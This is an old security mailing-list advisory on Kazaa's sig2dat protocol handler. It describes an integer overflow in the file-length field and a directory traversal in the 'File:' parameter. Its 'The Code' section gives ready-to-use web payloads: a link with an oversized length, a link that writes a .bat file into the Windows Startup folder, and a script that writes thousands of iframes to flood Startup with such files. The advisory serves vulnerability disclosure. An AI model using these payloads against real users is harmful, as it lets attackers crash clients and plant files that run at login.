[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <001201c4fcd4$d32e9c10$f85ab350@noone>
From: theinsider at 012.net.il (Rafel Ivgi, The-Insider)
Subject: Kazaa Sig2Dat Protocol Remote Integer Overflow
and Denial Of Service by creating files in arbitrary locations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Kazaa
Vendors: http://www.kazaa.com
Versions: kazaa lite k++(probably all others too...)
Platforms: Windows
Bug: Sig2Dat Protocol Remote Integer Overflow and
Denial Of Service by creating files in arbitrary
locations
Exploitation: Remote With Browser
Date: 17 Jan 2005
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@...l.com
Website: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Kazaa is currently the world?s most common P2P file sharing application.
When installing Kazaa a new protocol is installed named ?sig2dat?.
This protocol contain an integer overflow vulnerability which may cause
a crash and may allow remote execution of code. There is another
vulnerability in the ?File:? parameter which allows creating files in
arbitrary locations and committing Denial Of Service.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
The sig2dat protocol syntax:
Sig2dat://<filename>%7c<file length in bytes>< file length in
kilobytes>%7c<HASH>%7c
The vulnerable parameter is the file ?Length? (in bytes). Specifying a
numeric value bigger than a 999999999.
Successful exploiting of this vulnerability may allow remote code execution.
There is another vulnerability in the ?File:? parameter. It allows creation
of files in arbitrary locations within the same partition as the shared
folder,
using the classic directory transversal technique ?../?.
For Example:
<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/
Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEf
m3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
1) <A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:99999999999999999999
9999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK
HERE</A>
*********************************************************************
2) <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start
Menu
/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEf
m
3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
*********************************************************************
3) <script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All
Users
/Start
Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB%
7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
document.write(mylocation);
}
</script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
Powered by blists - more mailing lists